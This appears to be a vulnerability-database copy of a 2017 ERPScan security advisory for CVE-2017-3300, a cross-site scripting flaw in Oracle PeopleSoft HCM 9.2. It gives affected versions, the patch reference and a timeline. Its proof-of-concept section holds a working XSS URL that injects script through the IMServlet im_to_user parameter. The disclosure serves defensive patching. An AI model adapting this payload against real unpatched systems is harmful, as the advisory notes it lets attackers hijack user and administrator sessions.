Lucene search
K

Oracle PeopleSoft HCM 9.2 Cross Site Scripting Vulnerability

🗓️ 23 Jan 2017 00:00:00Reported by Vahagn VardanyanType 
zdt
 zdt
🔗 0day.today👁 44 Views

Oracle PeopleSoft HCM 9.2 XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Oracle PeopleSoft Enterprise PeopleTools Component Cross-Site Scripting Vulnerability
24 Jan 201700:00
cnvd
CVE
CVE-2017-3300
27 Jan 201722:01
cve
Cvelist
CVE-2017-3300
27 Jan 201722:01
cvelist
erpscan
Oracle PeopleSoft – XSS vulnerability
31 Oct 201600:00
erpscan
EUVD
EUVD-2017-12421
7 Oct 202500:30
euvd
NVD
CVE-2017-3300
27 Jan 201722:59
nvd
Oracle
Oracle Critical Patch Update Advisory - January 2017
17 Jan 201700:00
oracle
OSV
CVE-2017-3300
27 Jan 201722:59
osv
Packet Storm
Oracle PeopleSoft HCM 9.2 Cross Site Scripting
23 Jan 201700:00
packetstorm
Prion
Code injection
27 Jan 201722:59
prion
Rows per page
Application: Oracle PeopleSoft

Vendor: Oracle

Bugs: XXS

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Authors: Vahagn Vardanyan, Dmitry Yudin



1. ADVISORY INFORMATION

Title: Oracle PeopleSoft a XSS vulnerability

Advisory ID: [ERPSCAN-17-005]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle



2. VULNERABILITY INFORMATION

Class: XSS [CWE-79]

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2017-3300

CVSS Base Score: 6.1



3. VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of
administrators or users.



4. VULNERABLE PACKAGES


$ psreleaseinfo

ToolsRelease: 8.55.03

ToolsReleaseDB: 8.55



PeopleSoft HCM 9.2



PORTAL.war/WEB-INF/lib/mcfIM.jar



$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar

36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar



5. SOLUTIONS AND WORKAROUNDS

Oracle CPU January 2017


6. AUTHOR


Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13 )/ERPScan



7. TECHNICAL DESCRIPTION



7.1. Proof of Concept



xss


http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E



8. REPORT TIMELINE

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017



9. REFERENCES

http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation